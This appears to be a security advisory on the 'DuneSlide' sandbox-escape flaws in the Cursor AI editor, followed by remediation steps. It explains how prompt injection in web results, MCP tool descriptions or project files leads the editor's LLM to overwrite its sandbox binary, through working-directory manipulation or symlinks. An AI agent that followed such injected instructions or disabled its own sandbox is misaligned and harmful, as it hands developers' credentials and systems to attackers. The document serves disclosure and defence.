Two critical remote code execution vulnerabilities, collectively named "DuneSlide" and tracked as CVE-2026-50548 and CVE-2026-50549, have been publicly disclosed in the Cursor AI code editor. Both carry a CVSS score of 9.8 and let an attacker escape the application's sandbox and execute arbitrary code on a developer's machine with no deliberate action from the victim — just opening or processing attacker-controlled content is enough.

The flaws were discovered by Cato AI Labs and reported in February 2026. After initially being dismissed, they were escalated, acknowledged, and fixed in Cursor version 3.0 (released April 2026). CVE identifiers were formally assigned in June 2026. Cursor is in use at more than half of Fortune 500 companies. If you use Cursor and have not updated to version 3.0 or later, you are at risk of full system compromise through code you browse, web searches Cursor performs for you, or MCP servers connected to your workspace.

What the Vulnerabilities Are

Cursor integrates an LLM assistant that can execute terminal commands without prompting the user for each action. This design assumes the sandbox protecting command execution is robust. DuneSlide demonstrates it is not.

CVE-2026-50548 — Working Directory Manipulation → Sandbox Binary Overwrite

Cursor allows write access to the current working directory when the LLM executes commands, but fails to validate the working-directory parameter when the LLM sets it dynamically during a session. Through prompt injection — malicious instructions embedded in content Cursor's LLM processes, such as a compromised web-search result, a malicious MCP server tool description, or an attacker-crafted project file — an attacker can cause the LLM to set the working directory to an arbitrary path outside the project. Write access is now incorrectly scoped to that path, and the injected instructions overwrite Cursor's sandbox enforcement binary. On the next command execution, the sandbox is gone and all subsequent commands run unrestricted on the host. This is a complete sandbox escape requiring no user click.

CVE-2026-50549 — Symlink Resolution Failure → Overwrite of Protected Binaries

Cursor attempts to canonicalize file paths during write operations to keep files inside the project boundary. When canonicalization fails — for example, a symlink pointing to an inaccessible or non-existent intermediate path — Cursor falls back to trusting the original, un-canonicalized symlink path. An attacker can create a write-only symbolic link pointing from within the project to a critical binary outside it, such as the Cursor sandbox helper. When the LLM writes to what it believes is a project-local path, it actually overwrites the sandbox helper via the symlink. The next command execution runs without sandbox enforcement, granting arbitrary code execution on the host.

The Attack Path in Practice

Neither exploit requires the developer to do anything unusual:

  1. Developer opens a project in Cursor and performs routine tasks (asking Cursor to research a library, debug code, fetch a URL).
  2. Cursor's LLM fetches content from an attacker-controlled source — a malicious MCP server tool result, a poisoned web search result, or a crafted file in the opened project.
  3. The fetched content contains prompt-injection instructions telling the LLM to execute the DuneSlide exploit steps.
  4. The LLM follows the injected instructions, escapes the sandbox, and executes arbitrary commands as the developer's OS user.
  5. The attacker gains access to everything the developer's account can reach: SSH keys, git credentials, environment variables with API tokens, cloud provider credentials (AWS, GCP, Azure), deployment scripts, and production access.

Why It Matters

  • Developers are the highest-value targets for supply chain attacks. Compromising a developer's workstation is a force multiplier — it exposes every repository, staging environment, CI/CD pipeline, production deployment, and customer database that developer can reach.
  • The attack is zero-click. The victim need not open an attachment, visit a phishing site, or approve any unusual prompt. Cursor's core value proposition — automatically acting on LLM output — is the vulnerability.
  • MCP servers massively expand the attack surface. A malicious or compromised MCP server can inject instructions into every response it returns. Developers with many MCP integrations are exposed to many injection vectors.
  • Once the sandbox is gone, there is no secondary control. The scope of post-escape compromise is limited only by the developer's system permissions.

Am I Affected?

You are affected if you are running any version of Cursor IDE prior to 3.0. Check via Help → About. If your version begins with 2.x or earlier, you are running a vulnerable build. Cursor 3.0 (April 2026) contains the fixes for both CVEs; an additional patch shipped in June 2026 alongside the formal CVE assignment.

Elevated risk applies if you:

  • Use Cursor with MCP servers connected (each is an additional injection surface)
  • Allow Cursor to perform web searches or fetch external URLs during sessions
  • Work on open-source projects where project files could be crafted by contributors
  • Store extensive credentials in environment variables or dotfiles reachable from your dev environment

What to Do About It: Step-by-Step

Step 1: Update Cursor to version 3.0 or later immediately

Download the latest release from cursor.com or use Help → Check for Updates. There is no configuration workaround that prevents these exploits in older versions.

Step 2: Audit your MCP server connections

In Cursor settings, review all connected MCP servers. Remove any you do not actively use or cannot verify. Each connected MCP server is a potential injection vector.

Step 3: Rotate credentials that may have been exposed

If you ran a pre-3.0 version in sessions where it accessed external content, treat your credentials as potentially compromised:

  • Rotate SSH keys: generate a new key pair (ssh-keygen), update authorized_keys on all servers, remove the old key.
  • Rotate API tokens: GitHub, GitLab, AWS, GCP, Azure, Vercel, Netlify, Cloudflare, and any other service reachable from the compromised environment.
  • Rotate secrets stored in .env files, shell profiles, or credential managers.

Step 4: Review your shell history for unexpected commands

cat ~/.bash_history | tail -200
cat ~/.zsh_history | tail -200

Look for file copies to unusual locations, curl/wget to external IPs, SSH connections to unknown hosts, or base64-encoded payloads.

Step 5: Check for persistence mechanisms

# Cron jobs
crontab -l
ls -la /etc/cron.*

# SSH authorized keys
cat ~/.ssh/authorized_keys

# Login items (macOS)
ls ~/Library/LaunchAgents/

# Systemd user units (Linux)
systemctl --user list-units

Step 6: Add network-level monitoring for your dev environment

Consider running Cursor (and other AI IDE tools) inside a network namespace or VM that limits outbound connections to known-good destinations. This does not prevent DuneSlide but limits post-exploitation network activity.

Quick-Win Checklist

  • Updated Cursor IDE to version 3.0 or later on all development machines
  • Verified the version via Help → About — confirmed 3.0+
  • Audited and pruned MCP server connections
  • Rotated SSH keys for all servers reachable from the dev environment
  • Rotated API tokens (GitHub, cloud providers, deployment services, databases)
  • Reviewed shell history for unexpected commands
  • Checked authorized_keys, cron jobs, and login items for persistence
  • Communicated the update requirement to other developers on the team

Sources